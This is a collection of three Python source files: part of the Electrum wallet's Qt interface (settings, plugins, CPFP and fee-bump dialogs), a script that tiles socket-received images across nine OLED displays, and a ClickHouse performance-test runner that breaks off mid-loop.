self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
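# Illustrative numbers (hypothetical): a 300-byte parent that paid 300 sat plus a
# 150-byte child targeted at 10 sat/byte (10000 sat/kB) give
# 10000 * 450 / 1000 - 300 = 4200 sat for the child; the result is then capped at
# max_fee and floored at total_size (1 sat/byte for the combined size).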
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
updated_Display_Run.py
|
import cv2
import _thread
import time
import socket
import base64
import numpy
import multiprocessing as mp
from luma.core.interface.serial import i2c
from luma.core.render import canvas
from luma.oled.device import ssd1306, ssd1325, ssd1331, sh1106
from time import sleep
from PIL import Image
full_Data = b''
TCP_IP = '192.168.0.101'
TCP_PORT = 5050
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((TCP_IP, TCP_PORT))
s.listen(1)
conn, addr = s.accept()
# print(full_Data)
n_rows = 3
n_images_per_row = 3
width = 384
height = 192
dim = (width, height)
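# The 384x192 frame is split into a 3x3 grid below, so each tile is 128x64 pixels --
# the native resolution of an SSD1306 OLED module.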
serial9 = i2c(port=11, address=0x3C)
device9 = ssd1306(serial9)
serial8 = i2c(port=10, address=0x3C)
device8 = ssd1306(serial8)
serial7 = i2c(port=9, address=0x3C)
device7 = ssd1306(serial7)
serial6 = i2c(port=8, address=0x3C)
device6 = ssd1306(serial6)
serial5 = i2c(port=7, address=0x3C)
device5 = ssd1306(serial5)
serial4 = i2c(port=6, address=0x3C)
device4 = ssd1306(serial4)
serial3 = i2c(port=5, address=0x3C)
device3 = ssd1306(serial3)
serial2 = i2c(port=4, address=0x3C)
device2 = ssd1306(serial2)
serial1 = i2c(port=3, address=0x3C)
device1 = ssd1306(serial1)
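# The nine helpers below are identical; each exists only so that every OLED gets its own
# thread entry point when the tiles are pushed out in parallel.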
def print_Image(image,device):
device.display(image)
#print("print image1")
def print_Image2(image,device):
device.display(image)
#print("print image2")
def print_Image3(image,device):
device.display(image)
#print("print image3")
def print_Image4(image,device):
device.display(image)
#print("print image4")
def print_Image5(image,device):
device.display(image)
def print_Image6(image,device):
device.display(image)
def print_Image7(image,device):
device.display(image)
def print_Image8(image,device):
device.display(image)
def print_Image9(image,device):
device.display(image)
'''def process_1(image,device4,image2,device3):
print("Process1_called")
#device4.display(image)
#device3.display(image2)
_thread.start_new_thread(print_Image, (image,device4),)
_thread.start_new_thread(print_Image2, (image2,device3),)
def process_2(image3,device2,image4,device1):
print("Process2_called")
#device2.display(image3)
#device1.display(image4)
_thread.start_new_thread(print_Image3, (image3,device2),)
_thread.start_new_thread(print_Image4, (image4,device1),)
'''
while True:
while True:
stringData = conn.recv(4096)
#print(stringData)
#time.sleep(1)
#print(data)
if len(stringData) <= 0:
break
full_Data += stringData
data= base64.b64decode(full_Data)
nparr = numpy.frombuffer(data,dtype='uint8')
decimg=cv2.imdecode(nparr,0)
start_time = time.time()
#ret, frame = cap.read()
#cap = cv2.cvtColor(cap, cv2.COLOR_RGB2GRAY)
cap = cv2.resize(decimg, dim, interpolation = cv2.INTER_AREA)
height, width = cap.shape
roi_height = int(height / n_rows)
roi_width = int(width / n_images_per_row)
images = []
for x in range(0, n_rows):
for y in range(0, n_images_per_row):
tmp_image=cap[x*roi_height:(x+1)*roi_height, y*roi_width:(y+1)*roi_width]
images.append(tmp_image)
#Display image
for x in range(0, n_rows):
for y in range(0, n_images_per_row):
cv2.imshow(str(x*n_images_per_row+y+1),images[x*n_images_per_row+y])
cv2.moveWindow(str(x*n_images_per_row+y+1), 100+(y*roi_width), 50+(x*roi_height))
#image = Image.fromarray(images[0]).convert('1')
#image2 = Image.fromarray(images[1]).convert('1')
#image3 = Image.fromarray(images[2]).convert('1')
#image4 = Image.fromarray(images[3]).convert('1')
#time.sleep(.01)
#a=mp.Process(target=process_1, args=(image,image2,device4,device3,))
#b=mp.Process(target=process_2, args=(image3,image4,device2,device1,))
#time.sleep(.052)
#_thread.start_new_thread(print_Image, (image,device4),)
#_thread.start_new_thread(print_Image2, (image2,device3),)
#_thread.start_new_thread(print_Image3, (image3,device2),)
#_thread.start_new_thread(print_Image4, (image4,device1),)
#a.start()
#a.join()
#b.start()
#b.join()
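# Convert each grayscale tile to a 1-bit PIL image and push every tile to its OLED on a
# separate thread: images[0] (top-left) goes to device9, ..., images[8] (bottom-right) to device1.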
image = Image.fromarray(images[0]).convert('1')
image2 = Image.fromarray(images[1]).convert('1')
image3 = Image.fromarray(images[2]).convert('1')
image4 = Image.fromarray(images[3]).convert('1')
image5 = Image.fromarray(images[4]).convert('1')
image6 = Image.fromarray(images[5]).convert('1')
image7 = Image.fromarray(images[6]).convert('1')
image8 = Image.fromarray(images[7]).convert('1')
image9 = Image.fromarray(images[8]).convert('1')
time.sleep(.5)
_thread.start_new_thread(print_Image, (image,device9),)
_thread.start_new_thread(print_Image2, (image2,device8),)
_thread.start_new_thread(print_Image3, (image3,device7),)
_thread.start_new_thread(print_Image4, (image4,device6),)
_thread.start_new_thread(print_Image5, (image5,device5),)
_thread.start_new_thread(print_Image6, (image6,device4),)
_thread.start_new_thread(print_Image7, (image7,device3),)
_thread.start_new_thread(print_Image8, (image8,device2),)
_thread.start_new_thread(print_Image9, (image9,device1),)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
print(time.time()-start_time)
# 'cap' is a numpy array decoded from the socket data, not a cv2.VideoCapture,
# so there is nothing to release here; just close the connection.
conn.close()
cv2.destroyAllWindows()
s.close()
|
perf.py
|
#!/usr/bin/python3
import argparse
import clickhouse_driver
import itertools
import functools
import math
import os
import pprint
import random
import re
import statistics
import string
import sys
import time
import traceback
import logging
import xml.etree.ElementTree as et
from threading import Thread
from scipy import stats
logging.basicConfig(format='%(asctime)s: %(levelname)s: %(module)s: %(message)s', level='WARNING')
total_start_seconds = time.perf_counter()
stage_start_seconds = total_start_seconds
def reportStageEnd(stage):
global stage_start_seconds, total_start_seconds
current = time.perf_counter()
print(f'stage\t{stage}\t{current - stage_start_seconds:.3f}\t{current - total_start_seconds:.3f}')
stage_start_seconds = current
def tsv_escape(s):
return s.replace('\\', '\\\\').replace('\t', '\\t').replace('\n', '\\n').replace('\r','')
parser = argparse.ArgumentParser(description='Run performance test.')
# Explicitly decode files as UTF-8 because sometimes we have Russian characters in queries, and LANG=C is set.
parser.add_argument('file', metavar='FILE', type=argparse.FileType('r', encoding='utf-8'), nargs=1, help='test description file')
parser.add_argument('--host', nargs='*', default=['localhost'], help="Space-separated list of server hostname(s). Corresponds to '--port' options.")
parser.add_argument('--port', nargs='*', default=[9000], help="Space-separated list of server port(s). Corresponds to '--host' options.")
parser.add_argument('--runs', type=int, default=1, help='Number of query runs per server.')
parser.add_argument('--max-queries', type=int, default=None, help='Test no more than this number of queries, chosen at random.')
parser.add_argument('--queries-to-run', nargs='*', type=int, default=None, help='Space-separated list of indexes of queries to test.')
parser.add_argument('--profile-seconds', type=int, default=0, help='For how many seconds to profile a query for which the performance has changed.')
parser.add_argument('--long', action='store_true', help='Do not skip the tests tagged as long.')
parser.add_argument('--print-queries', action='store_true', help='Print test queries and exit.')
parser.add_argument('--print-settings', action='store_true', help='Print test settings and exit.')
parser.add_argument('--keep-created-tables', action='store_true', help="Don't drop the created tables after the test.")
parser.add_argument('--use-existing-tables', action='store_true', help="Don't create or drop the tables, use the existing ones instead.")
args = parser.parse_args()
reportStageEnd('start')
test_name = os.path.splitext(os.path.basename(args.file[0].name))[0]
tree = et.parse(args.file[0])
root = tree.getroot()
reportStageEnd('parse')
# Process query parameters
subst_elems = root.findall('substitutions/substitution')
available_parameters = {} # { 'table': ['hits_10m', 'hits_100m'], ... }
for e in subst_elems:
available_parameters[e.find('name').text] = [v.text for v in e.findall('values/value')]
# Takes parallel lists of templates, substitutes them with all combos of
# parameters. The set of parameters is determined based on the first list.
# Note: keep the order of queries -- sometimes we have DROP IF EXISTS
# followed by CREATE in create queries section, so the order matters.
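# For example (hypothetical values): with available_parameters = {'table': ['hits_10m', 'hits_100m']},
# substitute_parameters(['SELECT count() FROM {table}']) returns
# ['SELECT count() FROM hits_10m', 'SELECT count() FROM hits_100m'].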
def substitute_parameters(query_templates, other_templates = []):
query_results = []
other_results = [[] for _ in other_templates]  # one independent list per template (avoid aliasing from [[]] * n)
for i, q in enumerate(query_templates):
keys = set(n for _, n, _, _ in string.Formatter().parse(q) if n)
values = [available_parameters[k] for k in keys]
combos = itertools.product(*values)
for c in combos:
with_keys = dict(zip(keys, c))
query_results.append(q.format(**with_keys))
for j, t in enumerate(other_templates):
other_results[j].append(t[i].format(**with_keys))
if len(other_templates):
return query_results, other_results
else:
return query_results
# Build a list of test queries, substituting parameters to query templates,
# and reporting the queries marked as short.
test_queries = []
is_short = []
for e in root.findall('query'):
new_queries, [new_is_short] = substitute_parameters([e.text], [[e.attrib.get('short', '0')]])
test_queries += new_queries
is_short += [eval(s) for s in new_is_short]
assert(len(test_queries) == len(is_short))
# If we're given a list of queries to run, check that it makes sense.
for i in args.queries_to_run or []:
if i < 0 or i >= len(test_queries):
print(f'There is no query no. {i} in this test, only [{0}-{len(test_queries) - 1}] are present')
exit(1)
# If we're only asked to print the queries, do that and exit.
if args.print_queries:
for i in args.queries_to_run or range(0, len(test_queries)):
print(test_queries[i])
exit(0)
# Print short queries
for i, s in enumerate(is_short):
if s:
print(f'short\t{i}')
# If we're only asked to print the settings, do that and exit. These are settings
# for clickhouse-benchmark, so we print them as command line arguments, e.g.
# '--max_memory_usage=10000000'.
if args.print_settings:
for s in root.findall('settings/*'):
print(f'--{s.tag}={s.text}')
exit(0)
# Skip long tests
if not args.long:
for tag in root.findall('.//tag'):
if tag.text == 'long':
print('skipped\tTest is tagged as long.')
sys.exit(0)
# Print report threshold for the test if it is set.
ignored_relative_change = 0.05
if 'max_ignored_relative_change' in root.attrib:
ignored_relative_change = float(root.attrib["max_ignored_relative_change"])
print(f'report-threshold\t{ignored_relative_change}')
reportStageEnd('before-connect')
# Open connections
servers = [{'host': host or args.host[0], 'port': port or args.port[0]} for (host, port) in itertools.zip_longest(args.host, args.port)]
all_connections = [clickhouse_driver.Client(**server) for server in servers]
for i, s in enumerate(servers):
print(f'server\t{i}\t{s["host"]}\t{s["port"]}')
reportStageEnd('connect')
if not args.use_existing_tables:
# Run drop queries, ignoring errors. Do this before all other activity,
# because clickhouse_driver disconnects on error (this is not configurable),
# and the new connection loses the changes in settings.
drop_query_templates = [q.text for q in root.findall('drop_query')]
drop_queries = substitute_parameters(drop_query_templates)
for conn_index, c in enumerate(all_connections):
for q in drop_queries:
try:
c.execute(q)
print(f'drop\t{conn_index}\t{c.last_query.elapsed}\t{tsv_escape(q)}')
except:
pass
reportStageEnd('drop-1')
# Apply settings.
# If there are errors, report them and continue -- maybe a new test uses a setting
# that is not in master, but the queries can still run. If we have multiple
# settings and one of them throws an exception, all previous settings for this
# connection will be reset, because the driver reconnects on error (not
# configurable). So the end result is uncertain, but hopefully we'll be able to
# run at least some queries.
settings = root.findall('settings/*')
for conn_index, c in enumerate(all_connections):
for s in settings:
# requires clickhouse-driver >= 1.1.5 to accept arbitrary new settings
# (https://github.com/mymarilyn/clickhouse-driver/pull/142)
c.settings[s.tag] = s.text
reportStageEnd('settings')
# Check tables that should exist. If they don't exist, just skip this test.
tables = [e.text for e in root.findall('preconditions/table_exists')]
for t in tables:
for c in all_connections:
try:
res = c.execute("select 1 from {} limit 1".format(t))
except:
exception_message = traceback.format_exception_only(*sys.exc_info()[:2])[-1]
skipped_message = ' '.join(exception_message.split('\n')[:2])
print(f'skipped\t{tsv_escape(skipped_message)}')
sys.exit(0)
reportStageEnd('preconditions')
if not args.use_existing_tables:
# Run create and fill queries. We will run them simultaneously for both
# servers, to save time. The weird XML search + filter is because we want to
# keep the relative order of elements, and etree doesn't support the
# appropriate xpath query.
create_query_templates = [q.text for q in root.findall('./*')
if q.tag in ('create_query', 'fill_query')]
create_queries = substitute_parameters(create_query_templates)
# Disallow temporary tables, because the clickhouse_driver reconnects on
# errors, and temporary tables are destroyed. We want to be able to continue
# after some errors.
for q in create_queries:
if re.search('create temporary table', q, flags=re.IGNORECASE):
print(f"Temporary tables are not allowed in performance tests: '{q}'",
file = sys.stderr)
sys.exit(1)
def do_create(connection, index, queries):
for q in queries:
connection.execute(q)
print(f'create\t{index}\t{connection.last_query.elapsed}\t{tsv_escape(q)}')
threads = [
Thread(target = do_create, args = (connection, index, create_queries))
for index, connection in enumerate(all_connections)]
for t in threads:
t.start()
for t in threads:
t.join()
reportStageEnd('create')
# By default, test all queries.
queries_to_run = range(0, len(test_queries))
if args.max_queries:
# If specified, test a limited number of queries chosen at random.
queries_to_run = random.sample(range(0, len(test_queries)), min(len(test_queries), args.max_queries))
if args.queries_to_run:
# Run the specified queries.
queries_to_run = args.queries_to_run
# Run test queries.
profile_total_seconds = 0
for query_index in queries_to_run:
q = test_queries[query_index]
